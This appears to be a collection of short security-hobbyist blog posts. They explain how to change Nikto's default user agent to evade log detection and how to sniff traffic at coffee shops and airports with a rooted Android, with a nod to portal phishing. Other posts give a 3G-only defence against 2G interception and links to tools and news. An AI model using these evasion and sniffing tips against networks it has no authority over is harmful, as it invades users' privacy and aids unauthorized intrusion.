Watching the drunk bloke leave the local pub after way to many.
Seeing as he stumbles about in his drunken dance trying to stay on his feet.
Just before he hits the curb loses his footing and tumbles on his back into the middle of the roadway.

At least that’s what it feels like when you see the constant attempts to run web scanning tools against websites these days.
The scripts and tools have been dumb’d down so much that most people running the tools have no idea what they are doing.

That being said it’s not nearly as much fun if all the players don’t understand the rules to play the game.

So here is your first installment of how to UN-n00B your nikto script.
Since Nikto scans are such a commonly used tool out there it is something more website admin’s will look for and try to prevent.
The easiest way to do this is to just filter for the default Nikto user agent since many n00B’s will not bother to change this value.

Here is what it looks like in the web server logs:
Default User Agent

Pretty easy to see the big “Kick Me” sign there.
So let’s make that look better shall we?
First we need to verify we have a newer version of Nikto (v2+)
./nikto.pl --Version
Nikto Version Info
(older version’s of Nikto require modification of actual perl modules not covered here)

Next we edit the nikto.conf file (for BT users that’s /pentest/web/nikto/nikto.conf)
We want to change the following value
Nikto Default Agent Value
To something more friendly
Nikto Modified User Agent

Now when we look at the web server logs we see our changes
Nikto New Logs

Sometimes carrying around a laptop to conduct wireless recon can be a pain.
Today I will show how with your rooted Android & a couple free programs from the Android marketplace you can begin doing some real wireless recon.

Install:

To start search for and install the following 5 programs.
1) Droidwall
2) WiFi Analyzer
3) Shark for Root
4) Shark Reader
5) Network Discovery

Some other useful tools: ssh client, file manager w/SMB, RDP client, Wireless Tether,
Android Webserver, FTP client & server

Setup:

Once all programs are installed we setup our Droidwall like so
Droidwall Rule1Droidwall Rule2
Continue doing this for Network Discovery and other programs
you wish to use during your recon fun.

Action:

We launch our WiFi Analyzer
WiFi Analyzer Screen
Using the signal strength meter we find a good access point to visit.
Then we launch our Shark to eat up the packets out there.
Sharky
Eventually we will end up with some data to read.
We can use Shark Reader now or a desktop later to read the data.
Shark Reader 1Shark Reader 2
We can also use our Network Discovery tool to find devices
and services running on the target network.
Network Discovery

Some more advanced techniques using some of the additional tools mentioned above could be to launch phishing attacks in areas requiring users to login thru a web based portal.

When looking for cool spots to capture some traffic try your networks, coffee shops, airports, campuses, hotels, etc…

Freshly back from a new round of security based conferences I will take a moment to point out one of the more interesting topics for me this time around.
The discussion on Cell Phone Spying (not that I made it inside the actual talk with the ungodly line). More specifically how by using a frequency flooding technique on 2G networks its possible to do a MiTM type of ease drop on conversations & data. You can read more about it Here

As mentioned in the article a workaround for this issue would be to disable 2G mode on GSM phones.

Here is the quick and dirty way to do this in Android (tested on rooted phone)
DISCLAIMER: Forcing 3G mode will use more battery life
Also if your not on GSM don’t try this @ home…duh

Open Dialer and Enter: *#*#4636*#*#
After inputing the number you will be prompted with a “Testing” menu
Choose “Phone Information”
Scroll all the way down “Set preferred network type” and change this setting to WCDMA_only
That’s it!

Droid 3G Only Mode

I take no credit for the fix above as it was posted on the android dev forums.
Also this protects you from this exploit and any targeting 2G only, but many other GSM insecurities still exist. Another related topic also discussed was using a TOR client to obfuscate your traffic and make yourself much more anonymous. I will cover this topic a bit more in some upcoming Android based posts.

It was in 2006 that the language known as RUBY was fully accepted as a standard language. The self described “open source programming language with a focus on simplicity and productivity” is one of the more powerful languages in use today. The folks over at Matasano Security (not affiliated with “matz” Y.Matsumoto the creator of RUBY) have announced the release of ‘rbkb’ or The Ruby Black Bag.

‘rbkb’ is an ever growing collection of reversing and pen-testing related ruby libraries and tools I’ve been using and evolving for a long time now.

Head on over to their site to read more.

Those cool guys at Hack-A-Day have a fun article on how to hack your old atari system to make it S-Video compatible thus making it actually usable without that old TV slider switch. I think this will be a good reference to perform a similar hack on my ancient Tandy PC that I really want to see boot up again. Wonder what I can get to run on this old Tandy to make it useful again, and where did I put all those old Floppy disks and program cartridges?

Read More on the S-Video hack here

Unified threat management (UTM) is a promising approach to consolidating security controls, including firewalls, intrusion prevention, anti-virus, content filtering, and reporting.

Read More Here

A newer trend in the field of “Hacking” is the use of “Hacker Spaces”. Picture a community lab with various hardware/software for you to refine your skills in a controlled and safe environment. While this may not be a way to gain true real-world experience. It does help nuture your skill from a casual or novice hacker to someone who can say “I can do that!”.

Read more about Hacker Spaces

Think your ready for the big time now? Then head on over to the Defcon Capture the Flag competition in July/Aug.. I will see you there!